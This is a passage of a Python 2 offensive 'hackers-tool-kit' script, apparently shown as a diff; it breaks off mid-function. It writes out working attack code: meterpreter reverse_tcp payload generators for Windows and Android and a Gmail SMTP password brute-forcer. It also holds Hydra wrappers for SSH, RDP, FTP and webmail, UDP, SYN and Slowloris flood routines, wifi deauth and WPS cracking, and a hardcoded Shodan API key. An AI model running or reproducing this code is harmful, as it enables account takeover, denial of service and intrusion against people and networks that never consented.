"Starting hackers-tool-kit... [ *]-[23%]" -import colorama -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[25%]" -from modules import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[26%]" -import modules.colors -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[27%]" -import builtwith -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[29%]" -from urllib2 import urlopen -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[31%]" -from urllib2 import URLError -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[34%]" -from urllib2 import HTTPError -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[38%]" -from urllib import urlencode -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[39%]" -from plugins.DNSDumpsterAPI import DNSDumpsterAPI -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[41%]" -import whois -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[45%]" -import json -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[47%]" -from urlparse import urlparse -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[50%]" -from re import search, sub -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[55%]" -import cookielib -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[56%]" -import socket -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[59%]" -from scapy.all import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[60%]" -from threading import Thread, active_count -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[63%]" -import random -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[67%]" -import string -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[70%]" -import signal -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[73%]" -import ssl -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[79%]" -import argparse -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[83%]" -import sys -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[86%]" -import socks -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[89%]" -import mechanize -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[90%]" -import requests -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[94%]" -import time -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[96%]" -from datetime import datetime -now = datetime.now() -hour = now.hour -minute = now.minute -day = now.day -month = now.month -year = now.year -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[99%]" -sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -Gb = random._urandom(20000) -bytes = random._urandom(20000) -Kb = random._urandom(20000) -r = '\033[31m' -W = '\033[90m' -R = '\033[91m' -N = '\033[0m' -G = '\033[92m' -B = '\033[94m' -Y = '\033[93m' -LB = '\033[1;36m' -P = '\033[95m' -Bl = '\033[30m' -O = '\033[33m' -p = '\033[35m' -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" -os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") -os.system("service tor start") -os.system("service postgresql start") -os.system("clear") -def mainbanner(): - os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") - print N+"""\033[34m - .............. \033[0mtype ? for help\033[34m - ..,;:ccc,. - ......''';lxO. - .....''''..........,:ld; - .';;;:::;,,.x, - ..'''. 0Xxoc:,. ... - .... ,ONkc;,;cokOdc',. - . OMo ':ddo. - dMc :OO; - 0M. .:o. - ;Wd - ;XO, \033[93mCreated By @unkn0wn_bali On Instagram\033[34m - ,d0Odlc;,.. - ..',;:cdOOd::,. - .:d;.':;. - 'd, .' - ;l .. - .o - c - .' - .\033[92m - ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ - ██ ██ ▀▀▀██▀▀▀ ██ ██▀ - ██ ██ ██ ██▄██ - ████████ ██ █████ - ██ ██ █████ ██ █████ ██ ██▄ - ██ ██ ██ ██ ██▄ - ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m - ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ - ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ - ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - """.decode('utf-8') -def help(): - print B+""" -▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ - ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ - ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ -\033[0m ░ -? : displays this message -clear : clears screen except for banner -exit : exits script -restart : re run hackers-tool-kit -rebootl : reboot whole device -winload : windows reverse_tcp payload -andload : android reverse_tcp payload -command : execute terminal command -msfcon : metasploit console -set : setoolkit console -msfven : msfvenom -gmail : gmail bruteforce -insta : instagram bruteforce -fb : facebook bruteforce -hydra : Black-Hydra bruteforce -medusa : Medusa bruteforce -ipgrab : host to ip address -myip : show your ip -wifite : automated wifi hacker -reaver : reaver automated [ wifi hack ] -mon : put device in monitor mode -monoff : put device out of monitor mode -netdev : find all devices in your network -scannet : scan for networks around you -specnet : scan a specific network -port : scan for ports on a host -info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m -sysinfo : info about your system \033[91m ██ ██\033[0m -msfex : shows all metasploit exploits \033[91m ██ ██\033[0m -msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfall : shows all metasploit modules \033[91m ██ ██\033[0m -udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m -tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m -syn : SYN flood / dos \033[91m █ █\033[0m -slowl : Slow Loris dos \033[91m █ █ \033[0m -ping : pings host \033[91m █ █\033[0m -multih : start a multi handler \033[91m █ █\033[0m -cupp : make wordlists \/ vvvvvvvvv \/ -vdir : view files of a directory -vpn : activate a vpn TIP: "ctrl c" usually stops a script if you dont want to keep running it -vpnoff : stop vpn -pidox : dox website -pingen : Generate a routers default pin -deauth : deauth attack / wifi jammer -macc : changes mac address -macoff : returns mac address to normal -arppois : ARP poisoning -sslscan : ssl scan a host -payload : make a metasploit payload of your choice -crunch : Make wordlists -traff : shows your internet traffic -resa : reset account password -resu : reset unix password -hashid : find the type of hash of a hash -wafwoof : check a web application for firewall -cloud : cloudflare bypass -brutex : auto bruteforce every service of a host -methelp : show meterpreter help -winbyp : windows defender bypass -exploit : use a metasploit exploit of your choice -phish : phishing automated -datalist: list all hosts & services in the database -msfev : shows all metasploit evasions -upgrade : fully update your linux os -nscript : use a nmap script -sshver : scan for ssh version on a host -chains : browse web anonymous via proxychains [proxychains setup required] -mysqlv : scan for mysql version on a host -\033[91m---------------------------------------------------------------------------------\033[0m - """ -def winload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -def andload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -def gmail(): - #!/usr/bin/python - '''create by Ha3MrX''' - - import smtplib - from os import system - - def main(): - print '\033[93m=================================================' - print '\033[91m create by Ha3MrX ' - print '\033[93m=================================================' - print '\033[95m ++++++++++++++++++++ ' - print '\n ' - print '\033[92m _,. ' - print ' ' - print ' ' - print ' HA3MrX ' - print ' _,. ' - print ' ,` -.) ' - print ' ( _/-\\-._ ' - print ' /,|`--._,-^| , ' - print ' \_| |`-._/|| , | ' - print ' | `-, / | / / ' - print ' | || | / / ' - print ' `r-._||/ __ / / ' - print ' __,-<_ )`-/ `./ / ' - print ' \ `--- \ / / / ' - print ' | |./ / ' - print ' / // / ' - print ' \_/ \ |/ / ' - print ' | | _,^- / / ' - print ' | , `` (\/ /_ ' - print ' \,.->._ \X-=/^ ' - print ' ( / `-._//^` ' - print ' `Y-.____(__} ' - print ' | {__) ' - print ' () \033[91m V.1.0 ' - - main() - print '\033[0m[1] start the attack' - print '[2] exit' - option = input('==>') - if option == 1: - file_path = raw_input('path of passwords file :') - else: - system('clear') - exit() - pass_file = open(file_path,'r') - pass_list = pass_file.readlines() - def login(): - i = 0 - user_name = raw_input('target email :') - server = smtplib.SMTP_SSL('smtp.gmail.com', 465) - server.ehlo() - for password in pass_list: - i = i + 1 - print str(i) + '/' + str(len(pass_list)) - try: - server.login(user_name, password) - system('clear') - main() - print '\n' - print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' - break - except smtplib.SMTPAuthenticationError as e: - error = str(e) - if error[14] == '<': - system('clear') - main() - print '[+] this account has been hacked, password :' + password + ' ^_^' - - break - else: - print '[!] password not found => ' + password - login() -def port(): - n = raw_input("Enter Target: ") - os.system("nmap " + n) -def insta(): - insta = raw_input("USERNAME> ") - jl = raw_input("WORDLIST> ") - k = raw_input("THREADS> ") - ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) - os.system(ma) -def fb(): - facebook = raw_input("[EMAIL/ID->]: ") - word = raw_input("[WORDLIST->]: ") - ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) - os.system(ks) -def ipgrab(): - b = raw_input(Y+'Enter Host:\033[0m ') - ip = socket.gethostbyname(b) - print G+"------------------------\033[0m" - print N+"Host: ", b - print N+"IP: ", ip - print G+"------------------------\033[0m" -def myip(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) -def wifite(): - os.system("wifite") -def mon(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng start " + i) -def netdev(): - os.system("netdiscover") -def scannet(): - os.system("iwconfig") - m = raw_input("Select Interface: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - os.system("airodump-ng -w /root/SCAN " + m) - print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" - if j == "n": - os.system("airodump-ng " + m) -def info(): - params = [] - # Browser - br = mechanize.Browser() - - # Just some colors and shit - white = '\033[1;97m' - green = '\033[1;32m' - red = '\033[1;31m' - yellow = '\033[1;33m' - end = '\033[1;m' - info = '\033[1;33m[!]\033[1;m' - que = '\033[1;34m[?]\033[1;m' - bad = '\033[1;31m[-]\033[1;m' - good = '\033[1;32m[+]\033[1;m' - run = '\033[1;97m[~]\033[1;m' - - # Cookie Jar - cj = cookielib.LWPCookieJar() - br.set_cookiejar(cj) - - # Browser options - br.set_handle_equiv(True) - br.set_handle_redirect(True) - br.set_handle_referer(True) - br.set_handle_robots(False) - - # Follows refresh 0 but not hangs on refresh > 0 - br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) - br.addheaders = [ - ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] - - - print '''\033[1;31m - _________ __ __ __ - / _____// |________|__| | __ ___________ - \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ - / \| | | | \/ | <\ ___/| | \/ - /_______ /|__| |__| |__|__|_ \\\\___ >__| - \/ \/ \/\033[1;m''' - target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') - if 'http' in target: - parsed_uri = urlparse(target) - domain = '{uri.netloc}'.format(uri=parsed_uri) - else: - domain = target - try: - br.open('http://' + target) - target = 'http://' + target - except: - target = 'https://' + target - - def sqli(url): - print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run - br.open('https://suip.biz/?act=sqlmap') - br.select_form(nr=0) - br.form['url'] = url - req = br.submit() - result = req.read() - match = search(r"---(?s).*---", result) - if match: - print '%s One or more parameters are vulnerable to SQL injection' % good - option = raw_input( - '%s Would you like to see the whole report? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - print '\033[1;31m-\033[1;m' * 40 - print match.group().split('---')[1][:-3] - print '\033[1;31m-\033[1;m' * 40 - else: - print '%s None of parameters is vulnerable to SQL injection' % bad - - - def cms(domain): - try: - result = br.open('https://whatcms.org/?s=' + domain).read() - detect = search(r'class="nowrap" title="[^<]*">', result) - WordPress = False - try: - r = br.open(target + '/robots.txt').read() - if "wp-admin" in str(r): - WordPress = True - except: - pass - if detect: - print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) - detect = detect.group().split('">')[1][:-27] - if 'WordPress' in detect: - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - elif WordPress: - print '%s CMS Detected : WordPress' % info - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - else: - print '%s %s doesn\'t seem to use a CMS' % (info, domain) - except: - pass - - def honeypot(ip_addr): - result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} - honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr - try: - phoney = br.open(honey).read() - if float(phoney) >= 0.0 and float(phoney) <= 0.4: - what = good - else: - what = bad - print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) - except KeyError: - print '\033[1;31m[-]\033[1;m Honeypot prediction failed' - - def whoisIt(url): - who = "" - print '{} Trying to gather whois information for {}'.format(run,url) - try: - who = str(whois.whois(url)).decode() - except Exception: - pass - test = who.lower() - if "whoisguard" in test or "protection" in test or "protected" in test: - print '{} Whois Protection Enabled{}'.format(bad, end) - else: - print '{} Whois information found{}'.format(good, end) - try: - data = json.loads(who) - for key in data.keys(): - print "{} :".format(key.replace("_", " ").title()), - if type(data[key]) == list: - print ", ".join(data[key]) - else: - print "{}".format(data[key]) - except ValueError: - print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) - pass - - def nmap(ip_addr): - port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr - result = br.open(port).read() - result = sub(r'Starting[^<]*\)\.', '', result) - result = sub(r'Service[^<]*seconds', '', result) - result = os.linesep.join([s for s in result.splitlines() if s]) - print result - - def bypass(domain): - post = urlencode({'cfS': domain}) - result = br.open( - 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() - - match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) - if match: - bypass.ip_addr = match.group().split(' ')[1][:-1] - print '%s Real IP Address : %s' % (good, bypass.ip_addr) - - def dnsdump(domain): - res = DNSDumpsterAPI(False).search(domain) - print '\n%s DNS Records' % good - for entry in res['dns_records']['dns']: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - for entry in res['dns_records']['mx']: - print '\n%s MX Records' % good - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n\033[1;32m[+]\033[1;m Host Records (A)' - for entry in res['dns_records']['host']: - if entry['reverse_dns']: - print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) - else: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n%s TXT Records' % good - for entry in res['dns_records']['txt']: - print entry - print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) - - - def fingerprint(ip_addr): - try: - result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() - match = search(r'"os_description": "[^<]*"', result) - if match: - print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) - except: - pass - - - ip_addr = socket.gethostbyname(domain) - print '%s IP Address : %s' % (info, ip_addr) - try: - r = requests.get(target) - header = r.headers['Server'] - if 'cloudflare' in header: - print '%s Cloudflare detected' % bad - bypass(domain) - try: - ip_addr = bypass.ip_addr - except: - pass - else: - print '%s Server: %s' % (info, header) - try: - print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) - except: - pass - try: - r.headers['X-Frame-Options'] - except: - print '%s Clickjacking protection is not in place.' % good - except: - pass - fingerprint(ip_addr) - cms(domain) - try: - honeypot(ip_addr) - except: - pass - print "{}----------------------------------------{}".format(red, end) - whoisIt(domain) - try: - r = br.open(target + '/robots.txt').read() - print '\033[1;31m-\033[1;m' * 40 - print '%s Robots.txt retrieved\n' % good, r - except: - pass - print '\033[1;31m-\033[1;m' * 40 - nmap(ip_addr) - print '\033[1;31m-\033[1;m' * 40 - dnsdump(domain) - os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) - try: - br.open(target) - print '%s Crawling the target for fuzzable URLs' % run - for link in br.links(): - if 'http' in link.url or '=' not in link.url: - pass - else: - url = target + '/' + link.url - params.append(url) - if len(params) == 0: - print '%s No fuzzable URLs found' % bad - quit() - print '%s Found %i fuzzable URLs' % (good, len(params)) - for url in params: - print url - sqli(url) - url = url.replace('=', '') - r = br.open(url).read() - if '' in r: - print '%s One or more parameters are vulnerable to XSS' % good - break - print '%s These are the URLs having parameters:' % good - for url in params: - print url - except: - pass -def sysinfo(): - os.system("ifconfig") - os.system("iwconfig") - os.system("neofetch") - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) -def msfex(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show exploits'""") -def udp(): - target = raw_input(N+"Target:\033[91m ") - ip = socket.gethostbyname(target) - port = input(N+"Port:\033[91m ") - os.system("service tor restart") - print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) - os.system("sleep 2s") - sent = 0 - print "KILLING %s CONNECTIONS"%(ip) - while True: - sock.sendto(Gb, (ip,port)) - sock.sendto(bytes, (ip,port)) - sock.sendto(Kb, (ip,port)) - sent = sent + 1 - port = port + 1 - print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) - if port == 65534: - port = 1 -def tcp(): - print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" - print "\n" - tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") - print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" - os.system("sleep 5") - os.system("python /root/hackers-tool-kit/tools/" + tcp) -def syn(): - def randomIP(): - ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) - return ip - - def randInt(): - x = random.randint(1000,9000) - return x - - def SYN_Flood(dstIP,dstPort,counter): - total = 0 - print "Packets are sending ..." - for x in range (0,counter): - s_port = randInt() - s_eq = randInt() - w_indow = randInt() - - IP_Packet = IP () - IP_Packet.src = randomIP() - IP_Packet.dst = dstIP - - TCP_Packet = TCP () - TCP_Packet.sport = s_port - TCP_Packet.dport = dstPort - TCP_Packet.flags = "S" - TCP_Packet.seq = s_eq - TCP_Packet.window = w_indow - - send(IP_Packet/TCP_Packet, verbose=0) - total+=1 - sys.stdout.write("\nTotal packets sent: %i\n" % total) - - - def info(): - - dstIP = raw_input ("\nTarget IP : ") - dstPort = input ("Target Port : ") - - return dstIP,int(dstPort) - - - def main(): - dstIP,dstPort = info() - counter = input ("Packets : ") - SYN_Flood(dstIP,dstPort,int(counter)) - - main() - -def ping(): - p = raw_input("Enter Host: ") - os.system("ping " + p) -def msfpa(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show payloads'""") -def msfau(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show auxiliary'""") -def multih(): - os.system("service postgresql start") - os.system("""msfconsole -x 'use multi/handler'""") -def msfall(): - os.system("service postgresql start") - os.sytem("""msfconsole -x 'show all'""") -def hydra(): - """ - This program is just a small program to shorten brute force sessions on hydra :) - But to be more satisfying results of the brute force. You better interact directly with hydra, - without having to use this black hydra console first: '). - If you find any errors in running our program. Can chat via facebook :). - Hydra is needed for the process of this program :). - """ - import sys, os, time - - # Restart #################### - def restart_program(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - ############################## - - os.system("clear") - print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" - print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" - print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" - print G+"-----------------------------------------------------" - print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" - print R+" [*] Author: DedSecTL --- [*] Version 1.0" - print N+"c=={:::::::::::::::> Black Hydra Console" - print R+" [*] My FB : https://m.facebook.com/100004136748473" - print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" - print - print " ===|[ Brute Force ]|===" - print - print " [01] Cisco Brute Force " - print " [02] VNC Brute Force " - print " [03] FTP Brute Force " - print " [04] Gmail Brute Force " - print " [05] SSH Brute Force " - print " [06] TeamSpeak Brute Force " - print " [07] Telnet Brute Force " - print " [08] Yahoo Mail Brute Force " - print " [09] Hotmail Brute Force " - print " [10] Router Speedy Brute Force " - print " [11] RDP Brute Force " - print " [12] MySQL Brute Force " - print - print " [00] Exit" - print - bhydra = raw_input("[*] B-Hydra > ") - - if bhydra == '01' or bhydra == '1': - print - print " +---------------------------+" - print " | Cisco Brute Force |" - print " +---------------------------+" - print - print - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -P %s %s cisco" % (word, iphost)) - sys.exit() - - elif bhydra == '02' or bhydra == '2': - print - print " +---------------------------+" - print " | VNC Brute Force |" - print " +---------------------------+" - print - print - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) - iphost = raw_input("[*] IP/Hostname : ") - - elif bhydra == '03' or bhydra == '3': - print - print " +------------------------------+" - print " | FTP Brute Force |" - print " +------------------------------+" - print - print - user = raw_input("[*] User : ") - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '04' or bhydra == '4': - print - print " +------------------------------+" - print " | Gmail Brute Force |" - print " +------------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '05' or bhydra == '5': - print - print " +--------------------------------+" - print " | SSH Brute Force |" - print " +--------------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) - sys.exit() - - elif bhydra == '06' or bhydra == '6': - print - print " +-------------------------+" - print " | TeamSpeak Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) - sys.exit() - - elif bhydra == '07' or bhydra == '7': - print - print " +-------------------------+" - print " | Telnet Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) - sys.exit() - - elif bhydra == '08' or bhydra == '8': - print - print " +---------------------------+" - print " | Yahoo Brute Force |" - print " +---------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '09' or bhydra == '9': - print - print " +----------------------------+" - print " | Hotmail Brute Force |" - print " +----------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '10': - print - print " +-----------------------------+" - print " | Router Speedy Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) - sys.exit() - - elif bhydra == '11': - print - print " +----------------------------+" - print " | RDP Brute Force |" - print " +----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '12': - print - print " +-----------------------------+" - print " | MySQL Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) - - elif bhydra == '00' or bhydra == '0': - print "\n[!] Exit the Program..." - sys.exit() - - else: - print "\n[!] ERROR : Wrong Input" - time.sleep(1) - restart_program() -def cupp(): - os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") - print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" -def vdir(): - print "\n" - os.system("ls") - print Y+"! doesnt have to be these can be any directory !\033[0m" - print "\n" - h = raw_input("Directory Path: ") - print "\n" - print "--------------------------------------------------------------------------------------------------------------------------------------------" - os.system("ls " + h) - print "--------------------------------------------------------------------------------------------------------------------------------------------" - -def monoff(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng stop " + i) -def vpn(): - os.system("anonsurf start") - os.system("anonsurf myip") -def vpnoff(): - os.system("anonsurf stop") - os.system("anonsurf myip") -def slowl(): - de = raw_input("Delay: ") - tar = raw_input("RHOST: ") - port = raw_input("RPORT: ") - soc = raw_input("Sockets: ") - os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') - os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) - os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) - os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) - os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) - os.system('echo "run\n" >> slowl.rc') - os.system('msfconsole -r slowl.rc') - os.system('rm -rf slowl.rc') - -def pidox(): - print Y+"! USING FIREFOX !\033[0m" - os.system("sleep 2") - os.system("firefox https://pipl.com/") -def specnet(): - jk = raw_input("BSSID: ") - kj = raw_input("ESSID: ") - os.system("iwconfig") - k = raw_input("INTERFACE: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) - if j == "n": - a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) -def pingen(): - j = raw_input("Enter BSSID: ") - a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) - os.system(a) -def reaver(): - os.system("iwconfig") - j = raw_input("Select Interface: ") - k = raw_input("Enter BSSID: ") - a = 'reaver -i {0} -b {1} -vv'.format(j,k) - os.system(a) -def deauth(): - print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" - j = raw_input("Enter BSSID> ") - os.system("iwconfig") - k = raw_input("Enter Interface> ") - a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) - os.system(a) -def macc(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -r " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -def macoff(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -p " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -def arppois(): - - try: - os.system("iwconfig") - interface = raw_input("[*] Enter Interface: ") - victimIP = raw_input("[*] 